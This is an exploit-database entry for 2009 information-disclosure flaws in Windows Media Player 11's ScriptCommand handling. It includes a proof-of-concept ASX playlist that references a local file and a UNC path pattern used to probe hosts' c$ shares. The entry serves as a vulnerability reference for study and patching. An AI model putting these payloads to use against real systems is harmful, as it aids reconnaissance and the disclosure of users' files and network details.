Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities

2009-05-12T00:00:00
ID EXPLOITPACK:7778968E23E9CEAFD8A4A2CB1DAFFEF2
Type exploitpack
Reporter Rosario Valotta
Modified 2009-05-12T00:00:00

Description

Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/35335/info

Microsoft Windows Media Player is prone to multiple information-disclosure vulnerabilities because it fails to properly restrict access to certain functionality when handling media files.

An attacker can exploit these vulnerabilities to obtain information that may aid in further attacks. 

<ASX version="3.0">
<ENTRY>
<REF href="file://c:/test.wma"/>
</ENTRY>
</ASX>


The following command may be used to discover hosts:

file://\\<IP>\c$\a.mp3